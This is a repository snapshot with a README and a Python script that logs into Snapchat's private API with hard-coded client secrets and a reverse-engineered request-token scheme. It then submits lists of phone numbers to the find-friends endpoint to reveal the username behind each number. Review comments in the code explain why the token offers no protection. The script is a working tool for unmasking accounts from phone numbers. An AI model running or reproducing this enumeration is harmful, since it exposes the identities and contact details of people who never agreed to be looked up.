├── README.md └── sc-findusers.py /README.md: -------------------------------------------------------------------------------- 1 | sc-findusers 2 | ============ 3 | 4 | A command-line tool used to find the Snapchat usernames for known or unknown phone numbers 5 | 6 | ## Usage 7 | 8 | >$ python sc-findusers.py username password number1,number2 9 | > 10 | >success: found 2 results: 11 | > number: number1 12 | > username: number1s_username 13 | > 14 | > number: number2 15 | > username: number2s_username 16 | 17 | 18 | ## Prerequisites 19 | 20 | The following Python libraries are required: 21 | 22 | * requests 23 | * hashlib 24 | * simplejson 25 | 26 | ## Credits 27 | 28 | Thanks a lot to the following people and their resources; a majority of the work was already done by them. 29 | 30 | * [Thomas Lackner](https://github.com/tlack/snaphax) 31 | * [Adam Caudill](http://adamcaudill.com/2012/06/16/snapchat-api-and-security/) 32 | * [kivikakk](https://kivikakk.ee/2013/05/10/snapchat.html) 33 | 34 | ## Tools Used 35 | 36 | I used a few different tools to figure out what needed to be sent to the Snapchat server; it would have been much more difficult without them. 
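37 | 38 | * [APK dissasembler](http://code.google.com/p/easy-apk-dissassembler/) 39 | * [android-apktool](https://code.google.com/p/android-apktool/) 40 | * ettercap 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /sc-findusers.py: --------------------------------------------------------------------------------
#!/usr/bin/python
"""Look up Snapchat usernames for a comma-separated list of phone numbers.

Logs in through /ph/login, posts the numbers to /ph/find_friends and prints
the display number and username of every result.

Written for Python 2: sc_hash() concatenates str values before hashing, which
Python 3's hashlib rejects unless they are first encoded to bytes.
"""

import sys
import requests
import hashlib
import time
import simplejson

# Static values that are the same in every copy of this script. The login
# request's req_token is derived only from these constants and the timestamp
# (see sc_hash), so it identifies the client software, not a user, and gives
# the server no real access control. Protection of the lookup endpoint has to
# come from server-side measures such as rate limiting and per-account quotas.
TOKEN = 'm198sOkJEn37DjqZ32lpRu76xmw288xSQ9'
SECRET = 'iEk21fuwZApXlz93750dmW22pw389dPwOk'
# 64 selector characters, one per hex digit of a SHA-256 digest:
# '0' takes the digit from the first hash, '1' from the second.
HASH_PATTERN = '0001110111101110001111010101111011010001001110011000110001000110'
BASE_URL = 'https://feelinsonice.appspot.com'


def main(args):
    """Log in, submit the phone numbers and print the matches.

    args is sys.argv: [script, username, password, "number1,number2,..."].
    Exits with status 1 on a usage error, a failed login or a failed lookup.
    """
    # All three positional arguments are read below, so require them up front.
    # The original test (len(args) < 2) let short invocations die with an
    # IndexError instead of printing the usage line.
    if len(args) < 4:
        print("usage: python sc-findusers.py username password number1,number2")
        sys.exit(1)

    username, password, number_list = args[1], args[2], args[3]
    # NOTE(review): a password passed on the command line is visible in the
    # process list and in shell history; prompting with getpass would avoid it.

    # log in
    # NOTE(review): time.mktime() interprets the gmtime() tuple as local time,
    # so this value is shifted from the real epoch time by the local UTC
    # offset. Left exactly as the original computes it.
    ts = time.mktime(time.gmtime())
    params = {'username': username, 'password': password, 'timestamp': ts}

    try:
        r = sc_request('/ph/login', params, TOKEN, ts)
        # subsequent API calls should use this token instead of the static token
        auth_token = r['auth_token']
    except (requests.exceptions.RequestException, ValueError, KeyError):
        # HTTP/transport failure, a non-JSON body, or a reply without a token.
        print('error: login failed')
        sys.exit(1)

    ts = time.mktime(time.gmtime())
    # The endpoint receives a JSON object that maps every number to itself.
    numbers = dict((number, number) for number in number_list.split(','))

    numbers_json = simplejson.dumps(numbers)
    params = {'username': username, 'timestamp': ts,
              'numbers': numbers_json, 'countryCode': 'US'}
    try:
        r = sc_request('/ph/find_friends', params, auth_token, ts)
    except (requests.exceptions.RequestException, ValueError):
        # Narrowed from a bare except so that Ctrl-C and programming errors
        # are no longer reported as a lookup failure; failure exits non-zero.
        print('error: failed to retrieve numbers results')
        sys.exit(1)

    print('\nsuccess: found %d results:' % len(r['results']))

    for number in r['results']:
        print('\tnumber: ' + number['display'])
        print('\tusername: ' + number['name'])
        print('')


def sc_request(uri, post_params, tok, ts):
    """POST post_params plus a req_token to BASE_URL + uri and return the JSON body.

    Raises requests.exceptions.HTTPError on a 4xx/5xx response and ValueError
    when the body is not valid JSON.
    """
    # Work on a copy so the caller's dict is not modified as a side effect.
    payload = dict(post_params)
    payload['req_token'] = sc_hash(tok, ts)
    # A timeout keeps the script from hanging forever on an unresponsive server.
    r = requests.post(BASE_URL + uri, data=payload, timeout=30)
    r.raise_for_status()
    return r.json()


# seriously, snapchat team?
def sc_hash(tok, ts):
    """Build the 64-character req_token for a request.

    Two SHA-256 hex digests are computed, SECRET + tok and str(ts) + SECRET,
    and interleaved digit by digit as HASH_PATTERN dictates.
    """
    h1 = hashlib.sha256(SECRET + tok).hexdigest()
    h2 = hashlib.sha256(str(ts) + SECRET).hexdigest()

    # HASH_PATTERN and both hex digests are 64 characters long, so zip()
    # visits exactly the same positions as the original index loop.
    return ''.join(
        first if selector == '0' else second
        for selector, first, second in zip(HASH_PATTERN, h1, h2)
    )


if __name__ == "__main__":
    main(sys.argv)
--------------------------------------------------------------------------------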